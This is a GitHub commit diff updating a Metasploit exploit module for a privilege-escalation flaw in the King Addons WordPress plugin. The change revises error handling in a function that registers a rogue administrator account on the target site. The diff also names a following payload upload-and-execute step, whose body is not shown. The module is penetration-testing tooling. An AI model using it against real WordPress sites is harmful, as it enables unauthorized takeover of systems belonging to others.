Update modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb
Co-authored-by: Phil Townes <phil_townes@rapid7.com>
This commit is contained in:
Valentin Lobstein
committed by
GitHub
GitHub
parent
17cc68df0f
commit
c423ff07c5
@@ -180,16 +180,23 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
def create_admin_user(username, password, email)
|
||||
res = send_registration_request(username: username, email: email, password: password)
|
||||
return false unless res&.code == 200
|
||||
unless res&.code == 200
|
||||
fail_with(Failure::UnexpectedReply, 'Failed to create administrator account (HTTP error).')
|
||||
end
|
||||
|
||||
json = res.get_json_document
|
||||
return false unless json.is_a?(Hash)
|
||||
unless json.is_a?(Hash)
|
||||
fail_with(Failure::UnexpectedReply, 'Failed to create administrator account (Unexpected response.')
|
||||
end
|
||||
|
||||
return :user_exists if json['success'] == false && json.dig('data', 'message')&.match?(/already exists|username.*taken|user.*exists/i)
|
||||
return true if json['success'] == true
|
||||
if json['success'] == false && json.dig('data', 'message')&.match?(/already exists|username.*taken|user.*exists/i)
|
||||
print_warning('User already exists, attempting login with provided credentials...')
|
||||
return
|
||||
end
|
||||
|
||||
print_error("Unexpected response: #{res.body}")
|
||||
false
|
||||
return if json['success'] == true
|
||||
|
||||
fail_with(Failure::UnexpectedReply, "Unexpected response: #{res.body}")
|
||||
end
|
||||
|
||||
def upload_and_execute_payload(admin_cookie)
|
||||
|
||||
Reference in New Issue
Block a user